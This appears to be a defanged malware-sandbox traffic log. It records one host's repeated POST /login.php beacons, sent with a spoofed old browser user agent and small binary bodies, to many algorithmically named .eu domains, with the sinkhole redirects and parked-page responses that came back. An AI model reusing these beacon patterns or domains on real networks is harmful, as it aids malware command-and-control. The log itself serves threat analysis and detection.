5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>galokusemus.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'galokusemus.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0MC4zNzQ1OmJjMjE0NzM1MTkzNDc2MWFkMWJiYWY2YzRhMWI3NjQwYTljNjRkMDFlYzU2NmM4NDRiYTIxMjgxNjA5Y2E1NmY6NTY0ZWUzMmM1YjZmMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyYzVhNzFhfHx8MTQ0ODAxMDU0MC4zNzg3fDAxYmZkMzU0NTNjYTdmOGMzMzhiZmQyOTQzZmUzYmVjYmU5MWYwOTB8fHx8fDF8fHwwfDU2NGVlMzJjZmE1MjVmYjQ0MThiNDk1Ynx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET /domain/kemocujufys.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
Location: hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6
3e..Go hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: novomyfexij.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:06 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.novomyfexij.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:06 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.novomyfexij.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/nopegymozow.eu
Set-Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.ganycyhywek.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f3..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>ganycyhywek.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'ganycyhywek.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0OC40MjE6NWRiY2I0OWIyZGRkYzIzYmJlY2FiNzExYThkOGRmODhlZTY5NTUxMzNhZTM5OWQzYWMyZjg0YzFiMDBiMjU1ZTo1NjRlZTMzNDY2Y2Rk';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzNDY1MjY5fHx8MTQ0ODAxMDU0OC40MjQ5fGJlZDNjY2NlYjNkY2Q1MGY1Y2NhODlmZmE0ZDc5ZWMxYmEzN2JlMDZ8fHx8fDF8fHwwfDU2NGVlMzM0OGFiZjgyYjI0MzhiNjA5ZXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "hXXp://qui
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/kemocujufys.eu
Set-Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/qeqinuqypoq.eu
Set-Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /domain/marytymenok.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
Location: hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960
3e..Go hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.jeluganusog.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.jeluganusog.eu..Vary: Accept-Encoding..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.mamixikusah.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=902vr1955561446822064; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.mamixikusah.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.mamixikusah.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.mamixikusah.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.mamixikusah.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.mamixikusah.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: masawocipel.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.masawocipel.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:11 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.masawocipel.eu..Vary: Accept-Encoding..
GET /domain/gatedyhavyd.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
Location: hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81
3e..Go hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.jeluganusog.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:07 GMT
Server: Apache
Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.jeluganusog.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.jeluganusog.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.jeluganusog.eu&_cfrg=1&_driHTTP/1.1 200 OK..Date: Fri, 20 Nov 2015 09:09:07 GMT..Server: Apache..Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly..X-Frame-Options: DENY..X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==..Vary: Accept-Encoding,User-Agent..Content-Length: 1686..Keep-Alive: timeout=5, max=51..Connection: Keep-Alive..Content-Type: text/html; charse
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.ganycyhywek.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:38 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.ganycyhywek.eu..Vary: Accept-Encoding..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.masawocipel.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache
Set-Cookie: vsid=919vr1955561836832705; expires=Wed, 18-Nov-2020 09:09:43 GMT; path=/; domain=ww92.masawocipel.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.masawocipel.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.masawocipel.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.masawocipel.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.masawocipel.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
GET /d1e2832667be3ac8af2587e3c0958424 HTTP/1.1
Host: xsso.tucyguqaciq.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
19..Landed tucyguqaciq.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.ryleryqacic.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=916vr1955561446614594; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.ryleryqacic.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=109
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.ryleryqacic.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.ryleryqacic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.ryleryqacic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.ryleryqacic.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/gatedyhavyd.eu
Set-Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:52 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.xuqufyduras.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:52 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.xuqufyduras.eu..Vary: Accept-Encoding......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:55 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.xuqufyduras.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:55 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.xuqufyduras.eu..Vary: Accept-Encoding..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.novomyfexij.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:36 GMT
Server: Apache
Set-Cookie: vsid=914vr1955561764501275; expires=Wed, 18-Nov-2020 09:09:36 GMT; path=/; domain=ww92.novomyfexij.eu; httponly
X-Frame-Options: DENY
